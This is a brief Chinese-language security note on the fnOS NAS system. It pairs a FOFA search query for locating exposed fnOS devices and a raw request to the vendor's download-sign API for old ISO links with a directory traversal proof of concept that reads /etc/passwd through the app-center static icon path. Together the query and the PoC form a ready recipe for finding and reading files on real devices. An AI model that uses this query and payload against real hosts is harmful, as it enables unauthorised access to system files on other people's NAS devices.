Tips
FOFA
icon_hash="470295793"
title="飞牛 fnOS"获取历史版本下载链接
发送对应版本的请求包,服务器会返回下载地址
POST /api/download-sign HTTP/2
Host: fnnas.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-SG,zh-CN;q=0.9,zh;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
{
"url":
"https://iso.liveupdate.fnnas.com/x86_64/trim/fnos-1.1.11-1438.iso"
}目录遍历漏洞
POC
/app-center-static/serviceicon/myapp/%7B0%7D?size=../../../../etc/passwd